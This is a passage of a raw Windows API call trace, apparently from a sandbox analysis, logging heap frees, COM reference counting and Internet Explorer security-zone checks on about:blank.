IUnknown:Release (This=0x6cdf88) returned 0x0 [0187.076] IUnknown:Release (This=0xd121e4) returned 0x0 [0187.076] IUnknown:Release (This=0xd1e334) returned 0x0 [0187.077] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c5c60 | out: hHeap=0x5e0000) returned 1 [0187.077] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0187.077] CreateUri (in: pwzURI="about:blank", dwFlags=0x3002b84, dwReserved=0x0, ppURI=0x19a4dc | out: ppURI=0x19a4dc*=0x5f59d4) returned 0x0 [0187.078] IUri:GetScheme (in: This=0x5f59d4, pdwScheme=0x19a474 | out: pdwScheme=0x19a474*=0x11) returned 0x0 [0187.078] IUnknown:QueryInterface (in: This=0x5f59d4, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19a46c | out: ppvObject=0x19a46c*=0x5f59d4) returned 0x0 [0187.184] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.184] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.184] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.184] IUri:IsEqual (in: This=0x68e1fc, pUri=0x5f59d4, pfEqual=0x19a4c4 | out: pfEqual=0x19a4c4*=0) returned 0x0 [0187.185] IUnknown:Release (This=0x68e1fc) returned 0x7 [0187.185] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.185] IUri:GetAbsoluteUri (in: This=0x5f59d4, pbstrAbsoluteUri=0xcf8b10 | out: pbstrAbsoluteUri=0xcf8b10*="about:blank") returned 0x0 [0187.185] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x68ed98, Size=0x1c) returned 0x9eeb740 [0187.186] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.186] GetCurrentProcessId () returned 0xe14 [0187.187] IUnknown:Release (This=0x68e73c) returned 0x6 [0187.187] IUnknown:Release (This=0x68e73c) returned 0x5 [0187.188] GetCurrentThreadId () returned 0xb48 [0187.188] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8788 | out: hHeap=0x5e0000) returned 1 [0187.188] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9510 | out: hHeap=0x5e0000) returned 1 [0187.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eeb740 | out: hHeap=0x5e0000) returned 1 [0187.189] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68ed50 | out: hHeap=0x5e0000) returned 1 [0187.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5bb8 | out: hHeap=0x5e0000) returned 1 [0187.191] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5f28 | out: hHeap=0x5e0000) returned 1 [0187.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c8a58 | out: hHeap=0x5e0000) returned 1 [0187.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8338 | out: hHeap=0x5e0000) returned 1 [0187.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b65a8 | out: hHeap=0x5e0000) returned 1 [0187.193] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bc878 | out: hHeap=0x5e0000) returned 1 [0187.193] _wcsnicmp (_String1="erro", _String2="data", _MaxCount=0x4) returned 1 [0187.194] IUnknown:Release (This=0x68dcbc) returned 0x2 [0187.194] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8cc8 | out: hHeap=0x5e0000) returned 1 [0187.194] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8e68 | out: hHeap=0x5e0000) returned 1 [0187.194] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db310 | out: hHeap=0x5e0000) returned 1 [0187.194] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b65c8 | out: hHeap=0x5e0000) returned 1 [0187.195] GetCurrentThreadId () returned 0xb48 [0187.195] _wcsnicmp (_String1="res:", _String2="data", _MaxCount=0x4) returned 14 [0187.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3ea8 | out: hHeap=0x5e0000) returned 1 [0187.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc940 | out: hHeap=0x5e0000) returned 1 [0187.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d40 | out: hHeap=0x5e0000) returned 1 [0187.201] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d90 | out: hHeap=0x5e0000) returned 1 [0187.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.204] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef39f8 | out: hHeap=0x5e0000) returned 1 [0187.204] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dca20 | out: hHeap=0x5e0000) returned 1 [0187.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d20 | out: hHeap=0x5e0000) returned 1 [0187.205] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cb0 | out: hHeap=0x5e0000) returned 1 [0187.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3de0 | out: hHeap=0x5e0000) returned 1 [0187.209] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc9a0 | out: hHeap=0x5e0000) returned 1 [0187.210] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6db0 | out: hHeap=0x5e0000) returned 1 [0187.210] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96a8 | out: hHeap=0x5e0000) returned 1 [0187.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c70 | out: hHeap=0x5e0000) returned 1 [0187.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3d68 | out: hHeap=0x5e0000) returned 1 [0187.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb60 | out: hHeap=0x5e0000) returned 1 [0187.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6cf0 | out: hHeap=0x5e0000) returned 1 [0187.215] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9678 | out: hHeap=0x5e0000) returned 1 [0187.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6018 | out: hHeap=0x5e0000) returned 1 [0187.218] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6598 | out: hHeap=0x5e0000) returned 1 [0187.219] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.219] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.219] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x4) returned 0x9ee6c70 [0187.219] memcpy_s (in: _Destination=0x9ee6c70, _DestinationSize=0x4, _Source=0x19a340, _SourceSize=0x4 | out: _Destination=0x9ee6c70) returned 0x0 [0187.219] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x19a10c, dwReserved=0x0 | out: ppSM=0x19a10c*=0x6cdc08) returned 0x0 [0187.228] IUnknown:QueryInterface (in: This=0x6cdc08, riid=0x6d734ed8*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x19a110 | out: ppvObject=0x19a110*=0x6cdc08) returned 0x0 [0187.228] IUnknown:Release (This=0x6cdc08) returned 0x1 [0187.229] IInternetSecurityManager:SetSecuritySite (This=0x6cdc08, pSite=0xd121e4) returned 0x0 [0187.229] IUnknown:AddRef (This=0xd121e4) returned 0x101 [0187.229] IUnknown:QueryInterface (in: This=0xd121e4, riid=0x703b4814*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x19a0e8 | out: ppvObject=0x19a0e8*=0xd121e8) returned 0x0 [0187.229] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), riid=0x703b4b68*(Data1=0x49d33aad, Data2=0xf985, Data3=0x4b70, Data4=([0]=0x97, [1]=0xa0, [2]=0x28, [3]=0xec, [4]=0xeb, [5]=0x65, [6]=0x23, [7]=0xbf)), ppvObject=0x6cdc3c | out: ppvObject=0x6cdc3c*=0x0) returned 0x80004002 [0187.229] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x703b4c28*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x6cdc38 | out: ppvObject=0x6cdc38*=0x0) returned 0x80004002 [0187.230] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x703b4c38*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x6cdc34 | out: ppvObject=0x6cdc34*=0x0) returned 0x80004002 [0187.230] IServiceProvider:QueryService (in: This=0xd121e8, guidService=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x703b4c18*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x6cdc30 | out: ppvObject=0x6cdc30*=0xd1e334) returned 0x0 [0187.230] IUnknown:Release (This=0xd121e8) returned 0x0 [0187.230] IUnknown:AddRef (This=0x6cdc08) returned 0x2 [0187.230] IUnknown:AddRef (This=0x5f59d4) returned 0x6 [0187.230] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.230] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="about:blank", pdwZone=0x19a160, dwFlags=0x0 | out: pdwZone=0x19a160*=0xffffffff) returned 0x800c0011 [0187.232] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.232] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.232] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdc08, pUri=0x5f59d4, dwAction=0x2106, pPolicy=0x19a164, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x19a144 | out: pPolicy=0x19a164*=0x0, pdwOutFlags=0x19a144*=0x0) returned 0x0 [0187.232] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x19a164, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x19a164*=0x0) returned 0x0 [0187.233] IUnknown:Release (This=0x6cdc08) returned 0x1 [0187.233] IUnknown:Release (This=0x5f59d4) returned 0x5 [0187.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.233] malloc (_Size=0x10) returned 0xc5fbf0 [0187.234] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3bd8 | out: hHeap=0x5e0000) returned 1 [0187.234] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef10b0 | out: hHeap=0x5e0000) returned 1 [0187.235] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b64d8 | out: hHeap=0x5e0000) returned 1 [0187.235] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6518 | out: hHeap=0x5e0000) returned 1 [0187.237] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d30 | out: hHeap=0x5e0000) returned 1 [0187.237] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9a70 | out: hHeap=0x5e0000) returned 1 [0187.237] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c20 | out: hHeap=0x5e0000) returned 1 [0187.238] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7938 | out: hHeap=0x5e0000) returned 1 [0187.238] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a18 | out: hHeap=0x5e0000) returned 1 [0187.238] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0187.238] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc8e0 | out: hHeap=0x5e0000) returned 1 [0187.238] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d96d8 | out: hHeap=0x5e0000) returned 1 [0187.239] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6dd0 | out: hHeap=0x5e0000) returned 1 [0187.239] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3d40 | out: hHeap=0x5e0000) returned 1 [0187.239] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c10 | out: hHeap=0x5e0000) returned 1 [0187.241] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3ac0 | out: hHeap=0x5e0000) returned 1 [0187.241] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc9c0 | out: hHeap=0x5e0000) returned 1 [0187.241] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c90 | out: hHeap=0x5e0000) returned 1 [0187.242] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c60 | out: hHeap=0x5e0000) returned 1 [0187.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3cf0 | out: hHeap=0x5e0000) returned 1 [0187.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc900 | out: hHeap=0x5e0000) returned 1 [0187.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d50 | out: hHeap=0x5e0000) returned 1 [0187.243] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d70 | out: hHeap=0x5e0000) returned 1 [0187.244] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9600 | out: hHeap=0x5e0000) returned 1 [0187.244] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc860 | out: hHeap=0x5e0000) returned 1 [0187.254] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3b60 | out: hHeap=0x5e0000) returned 1 [0187.255] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef11b0 | out: hHeap=0x5e0000) returned 1 [0187.255] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9390 | out: hHeap=0x5e0000) returned 1 [0187.255] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6498 | out: hHeap=0x5e0000) returned 1 [0187.256] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b6568 | out: hHeap=0x5e0000) returned 1 [0187.256] GetCurrentProcessId () returned 0xe14 [0187.257] IUri:GetAbsoluteUri (in: This=0x9ee0784, pbstrAbsoluteUri=0x19a1a8 | out: pbstrAbsoluteUri=0x19a1a8*="res://ieframe.dll/warning.gif") returned 0x0 [0187.257] IUnknown:AddRef (This=0x9ee0784) returned 0x4 [0187.258] IUri:IsEqual (in: This=0x9ee0784, pUri=0x9ee0784, pfEqual=0x19a19c | out: pfEqual=0x19a19c*=1) returned 0x0 [0187.258] IUnknown:Release (This=0x9ee0784) returned 0x3 [0187.259] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c40 | out: hHeap=0x5e0000) returned 1 [0187.259] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db628 | out: hHeap=0x5e0000) returned 1 [0187.260] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc8a0 | out: hHeap=0x5e0000) returned 1 [0187.260] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8068 | out: hHeap=0x5e0000) returned 1 [0187.260] IUnknown:Release (This=0x9ee0784) returned 0x2 [0187.260] IUnknown:Release (This=0x9ee0784) returned 0x1 [0187.261] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef15b0 | out: hHeap=0x5e0000) returned 1 [0187.263] IUnknown:Release (This=0x613358) returned 0x2 [0187.264] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c70 | out: hHeap=0x5e0000) returned 1 [0187.265] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.265] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.265] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcb60 [0187.265] memcpy_s (in: _Destination=0x6dcb60, _DestinationSize=0x14, _Source=0x6d8768, _SourceSize=0x14 | out: _Destination=0x6dcb60) returned 0x0 [0187.265] GetCurrentProcessId () returned 0xe14 [0187.265] GetCurrentThreadId () returned 0xb48 [0187.265] GetCurrentThreadId () returned 0xb48 [0187.265] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dca00 [0187.265] memcpy_s (in: _Destination=0x6dca00, _DestinationSize=0x14, _Source=0x6d8768, _SourceSize=0x14 | out: _Destination=0x6dca00) returned 0x0 [0187.268] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dca00 | out: hHeap=0x5e0000) returned 1 [0187.268] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcb60 | out: hHeap=0x5e0000) returned 1 [0187.279] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef0ed0 | out: hHeap=0x5e0000) returned 1 [0187.280] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d87a8 | out: hHeap=0x5e0000) returned 1 [0187.281] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8768 | out: hHeap=0x5e0000) returned 1 [0187.281] IUnknown:Release (This=0x68e73c) returned 0x4 [0187.282] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5ca8 | out: hHeap=0x5e0000) returned 1 [0187.285] IUnknown:Release (This=0x5f59d4) returned 0x4 [0187.286] LsDestroyContext () returned 0x0 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648238 | out: hHeap=0x5e0000) returned 1 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6377c8 | out: hHeap=0x5e0000) returned 1 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648350 | out: hHeap=0x5e0000) returned 1 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6377f8 | out: hHeap=0x5e0000) returned 1 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610728 | out: hHeap=0x5e0000) returned 1 [0187.286] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610908 | out: hHeap=0x5e0000) returned 1 [0187.287] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6060f8 | out: hHeap=0x5e0000) returned 1 [0187.287] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60a970 | out: hHeap=0x5e0000) returned 1 [0187.287] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6106b0 | out: hHeap=0x5e0000) returned 1 [0187.287] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610868 | out: hHeap=0x5e0000) returned 1 [0187.287] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610930 | out: hHeap=0x5e0000) returned 1 [0187.288] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610750 | out: hHeap=0x5e0000) returned 1 [0187.288] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648640 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648a48 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648b78 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648ca0 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648db0 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x648ee8 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x688810 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x686078 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f0b80 | out: hHeap=0x5e0000) returned 1 [0187.289] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x62a650 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6a08 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63f720 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64a4b0 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64a068 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68a710 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x688fe8 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x615730 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x649f70 | out: hHeap=0x5e0000) returned 1 [0187.290] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x649cf0 | out: hHeap=0x5e0000) returned 1 [0187.291] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64a3a0 | out: hHeap=0x5e0000) returned 1 [0187.291] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x647bc0 | out: hHeap=0x5e0000) returned 1 [0187.291] GetCurrentThreadId () returned 0xb48 [0187.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08000 | out: lpSystemTimeAsFileTime=0xc08000*(dwLowDateTime=0x763c35fc, dwHighDateTime=0x1d7d80b)) [0187.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08010 | out: lpSystemTimeAsFileTime=0xc08010*(dwLowDateTime=0x763c35fc, dwHighDateTime=0x1d7d80b)) [0187.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x763c35fc, dwHighDateTime=0x1d7d80b)) [0187.292] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x763c49f9, dwHighDateTime=0x1d7d80b)) [0187.294] free (_Block=0xc53ce8) [0187.294] free (_Block=0xc52038) [0187.294] free (_Block=0xc52110) [0187.294] free (_Block=0xc5d158) [0187.294] free (_Block=0xc521d0) [0187.294] free (_Block=0xc51fc0) [0187.295] free (_Block=0xc51ff0) [0187.295] free (_Block=0xc52170) [0187.295] free (_Block=0xc52128) [0187.295] free (_Block=0xc51f90) [0187.295] free (_Block=0xc520c8) [0187.295] free (_Block=0xc52188) [0187.295] free (_Block=0xc5d338) [0187.295] free (_Block=0xc51f30) [0187.295] free (_Block=0xc52050) [0187.295] free (_Block=0xc5fc80) [0187.295] free (_Block=0xc51f18) [0187.295] free (_Block=0xc52200) [0187.295] free (_Block=0xc5fab8) [0187.295] free (_Block=0xc5fb90) [0187.295] free (_Block=0xc5fcf8) [0187.295] free (_Block=0xc5fcc8) [0187.295] free (_Block=0xc5faa0) [0187.295] free (_Block=0xc5fbc0) [0187.295] free (_Block=0xc5fbd8) [0187.295] free (_Block=0xc5fba8) [0187.295] free (_Block=0xc5fce0) [0187.295] free (_Block=0xc522c0) [0187.295] free (_Block=0xc52248) [0187.295] free (_Block=0xc52290) [0187.295] free (_Block=0xc5d218) [0187.296] free (_Block=0xc51f60) [0187.296] free (_Block=0xc51f48) [0187.296] free (_Block=0xc52098) [0187.296] free (_Block=0xc521b8) [0187.296] free (_Block=0xc52068) [0187.296] VirtualFree (lpAddress=0x9550000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.297] VirtualFree (lpAddress=0x9544000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.297] VirtualFree (lpAddress=0x759d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.298] GetTickCount () returned 0x1d7954d [0187.298] GetTickCount () returned 0x1d7954d [0187.298] RtlInterlockedPopEntrySList (in: ListHead=0xc00798 | out: ListHead=0xc00798) returned 0x0 [0187.298] RtlInterlockedPopEntrySList (in: ListHead=0xc00778 | out: ListHead=0xc00778) returned 0x0 [0187.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08028 | out: lpSystemTimeAsFileTime=0xc08028*(dwLowDateTime=0x763d34e7, dwHighDateTime=0x1d7d80b)) [0187.298] GetProcessHeap () returned 0x5e0000 [0187.299] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3f00 | out: hHeap=0x5e0000) returned 1 [0187.299] VirtualFree (lpAddress=0x9553000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.299] free (_Block=0xc5a8e8) [0187.299] free (_Block=0xc4fdf0) [0187.299] free (_Block=0xc10b30) [0187.300] CloseHandle (hObject=0x660) returned 1 [0187.300] CloseHandle (hObject=0x65c) returned 1 [0187.300] CloseHandle (hObject=0x658) returned 1 [0187.300] CloseHandle (hObject=0x654) returned 1 [0187.300] free (_Block=0xc50618) [0187.300] VirtualFree (lpAddress=0x9640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.301] free (_Block=0xc5aa38) [0187.301] free (_Block=0xc50b98) [0187.301] VirtualFree (lpAddress=0x7561000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.301] free (_Block=0xc5a760) [0187.301] VirtualFree (lpAddress=0x9556000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.302] VirtualFree (lpAddress=0x736d000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.302] free (_Block=0xc4fe80) [0187.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08030 | out: lpSystemTimeAsFileTime=0xc08030*(dwLowDateTime=0x763dd1b1, dwHighDateTime=0x1d7d80b)) [0187.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08038 | out: lpSystemTimeAsFileTime=0xc08038*(dwLowDateTime=0x763dd1b1, dwHighDateTime=0x1d7d80b)) [0187.302] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc08040 | out: lpSystemTimeAsFileTime=0xc08040*(dwLowDateTime=0x763dd1b1, dwHighDateTime=0x1d7d80b)) [0187.302] GetSystemTimeAsFileTime (in: 